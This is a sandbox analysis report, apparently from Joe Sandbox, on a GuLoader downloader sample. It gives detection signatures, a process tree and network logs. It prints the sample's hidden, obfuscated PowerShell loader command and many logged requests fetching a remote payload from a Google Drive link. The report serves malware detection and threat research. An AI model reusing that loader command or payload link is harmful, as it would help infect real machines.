Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AM983ebb5F.exe

Overview

General Information

Sample name:AM983ebb5F.exe
renamed because original name is a hash value
Original sample name:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875.exe
Analysis ID:1588781
MD5:03abc55b8081dadf39d55ebd481bef1c
SHA1:9b7da36f4fed678308ed8f88bb0ae9797969f8f5
SHA256:d7e1f00ddf7e5b61046566992a771ff1ae5b99ac2df6c906b7cde3d24c611875
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • AM983ebb5F.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\AM983ebb5F.exe" MD5: 03ABC55B8081DADF39D55EBD481BEF1C)
    • powershell.exe (PID: 6988 cmdline: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Anthranil.exe (PID: 6660 cmdline: "C:\Users\user\AppData\Local\Temp\Anthranil.exe" MD5: 03ABC55B8081DADF39D55EBD481BEF1C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3009478955.000000000363A000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) ", CommandLine: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AM983ebb5F.exe", ParentImage: C:\Users\user\Desktop\AM983ebb5F.exe, ParentProcessId: 6640, ParentProcessName: AM983ebb5F.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Celeries=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Alternere.Mor';$Enedirektrs=$Celeries.SubString(13958,3);.$Enedirektrs($Celeries) ", ProcessId: 6988, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T05:29:32.250610+010028032702Potentially Bad Traffic192.168.2.449202216.58.206.46443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\Anthranil.exeVirustotal: Detection: 69%Perma Link
    Multi AV Scanner detection for submitted file
    Source: AM983ebb5F.exeReversingLabs: Detection: 50%
    Source: AM983ebb5F.exeVirustotal: Detection: 69%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: AM983ebb5F.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49202 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49209 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49251 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49268 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49283 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49314 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49324 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49326 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49328 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49330 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49332 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49334 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49336 version: TLS 1.2
    Source: AM983ebb5F.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: mshtml.pdbUGP source: Anthranil.exe, 00000006.00000001.2413832004.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
    Source: C:\Users\user\Desktop\AM983ebb5F.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
    Source: global trafficTCP traffic: 192.168.2.4:65412 -> 162.159.36.2:53
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49202 -> 216.58.206.46:443
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
    Source: global trafficHTTP traffic detected: GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
